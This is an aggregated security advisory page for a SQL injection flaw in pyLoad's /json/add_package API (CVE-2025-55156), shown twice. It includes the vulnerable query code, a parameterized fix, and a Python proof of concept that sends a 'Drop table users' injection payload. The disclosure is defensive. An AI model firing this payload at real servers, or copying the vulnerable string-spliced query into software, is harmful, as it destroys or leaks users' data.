Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-pwh4-6r3m-j2rf: PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter

Summary

The parameter add_links in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.

Details

  • Affected file:https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271
  • Affected code:
@style.queue
    def update_link_info(self, data):
        """
        data is list of tuples (name, size, status, url)
        """
        self.c.executemany(
            "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)",
            data,
        )
        ids = []
        statuses = "','".join(x[3] for x in data)
        self.c.execute(f"SELECT id FROM links WHERE url IN ('{statuses}')")
        for r in self.c:
            ids.append(int(r[0]))
        return ids

statuses is constructed from data, and data is the value of the add_links parameter entered by the user through /json/add_packge. Because {statuses} is directly spliced into the SQL statement, it leads to the SQL injection vulnerability.

  • Vulnerability Chain
josn_blueprint.py#add_package
src/pyload/core/api/__init__.py#add_package
src/pyload/core/managers/file_manager.py#add_links
src/pyload/core/threads/info_thread.py#run
src/pyload/core/threads/info_thread.py#update_info
src/pyload/core/managers/file_manager.py#update_file_info
src/pyload/core/database/file_database.py#update_link_info

PoC

import requests


if __name__ == "__main__":
    url = "http://localhost:8000/json/add_package"
    data = {
        "add_name": "My Downloads1",
        "add_dest": "0",
        "add_links": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--",
        "add_password": "mypassword"
    }

    response = requests.post(url, cookies=your_cookies, data=data)
    print(response.status_code, response.text)

<img width="1599" height="827" alt="image" src="https://github.com/user-attachments/assets/9bdcef37-59b8-4e60-a2b5-beb8a88c3202" />

Remediation

def update_link_info(self, data):
   """
data is list of tuples (name, size, status, url)
"""
   self.c.executemany(
       "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)",
       data,
   )
   
   # 提取所有url
   urls = [x[3] for x in data]
   
   # 构建参数化查询,避免SQL注入
   placeholders = ','.join(['?'] * len(urls))
   query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)"
   self.c.execute(query, urls)
   
   ids = [int(row[0]) for row in self.c.fetchall()]
   return ids

Impact

Attackers can modify or delete data in the database, causing data errors or loss.

ghsa
Open in Source
#sql#vulnerability#js#git
  1. GitHub Advisory Database
  2. GitHub Reviewed
  3. CVE-2025-55156

PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter

High severity GitHub Reviewed Published Aug 9, 2025 in pyload/pyload • Updated Aug 12, 2025

Package

pip pyload-ng (pip)

Affected versions

< 0.5.0b3.dev91

Patched versions

0.5.0b3.dev91

Summary

The parameter add_links in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.

Details

  • Affected file:https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271
  • Affected code:

@style.queue def update_link_info(self, data): “"” data is list of tuples (name, size, status, url) “"” self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, ) ids = [] statuses = "’,’".join(x[3] for x in data) self.c.execute(f"SELECT id FROM links WHERE url IN (‘{statuses}’)") for r in self.c: ids.append(int(r[0])) return ids

statuses is constructed from data, and data is the value of the add_links parameter entered by the user through /json/add_packge. Because {statuses} is directly spliced into the SQL statement, it leads to the SQL injection vulnerability.

  • Vulnerability Chain

josn_blueprint.py#add_package src/pyload/core/api/__init__.py#add_package src/pyload/core/managers/file_manager.py#add_links src/pyload/core/threads/info_thread.py#run src/pyload/core/threads/info_thread.py#update_info src/pyload/core/managers/file_manager.py#update_file_info src/pyload/core/database/file_database.py#update_link_info

PoC

import requests

if __name__ == "__main__": url = “http://localhost:8000/json/add_package” data = { "add_name": "My Downloads1", "add_dest": "0", "add_links": "https://www.dailymotion.com/video/x8zzzzz’) or 1; Drop table users;–", "add_password": “mypassword” }

response \= requests.post(url, cookies\=your\_cookies, data\=data)
print(response.status\_code, response.text)

Remediation

def update_link_info(self, data): “"” data is list of tuples (name, size, status, url) “"” self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, )

# 提取所有url urls = [x[3] for x in data]

# 构建参数化查询,避免SQL注入 placeholders = ',’.join([‘?’] * len(urls)) query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)" self.c.execute(query, urls)

ids = [int(row[0]) for row in self.c.fetchall()] return ids

Impact

Attackers can modify or delete data in the database, causing data errors or loss.

References

  • GHSA-pwh4-6r3m-j2rf
  • pyload/pyload@134edcd
  • https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271

Published to the GitHub Advisory Database

Aug 12, 2025

Last updated

Aug 12, 2025

ghsa: Latest News

GHSA-r3v7-pc4g-7xp9: Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers
ghsa